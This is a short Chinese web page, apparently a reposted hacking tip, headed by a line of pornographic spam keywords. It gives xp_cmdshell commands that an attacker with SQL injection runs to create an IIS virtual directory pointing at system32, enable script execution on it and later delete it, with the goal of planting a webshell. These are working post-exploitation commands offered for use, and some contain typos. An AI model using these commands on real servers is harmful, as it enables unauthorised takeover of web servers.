欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

SQL注入建立虛擬目錄,找Web絕對(duì)路徑!

 更新時(shí)間:2007年01月16日 00:00:00   作者:  
我們很多情況下都遇到SQL注入可以列目錄和運(yùn)行命令,但是卻很不容易找到web所在目錄,也就不好得到一個(gè)webshell,這一招不錯(cuò): 

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 
建立虛擬目錄win,指向c:\winnt\system32 
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture' 
讓win句有解析asp腳本權(quán)限 

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/" 
刪除虛擬目錄。 
找不到web絕對(duì)路徑的一種解決辦法, 

http://21o.net/h4x0r 
403錯(cuò)誤,表示虛擬目錄建好了。。。  

相關(guān)文章

最新評(píng)論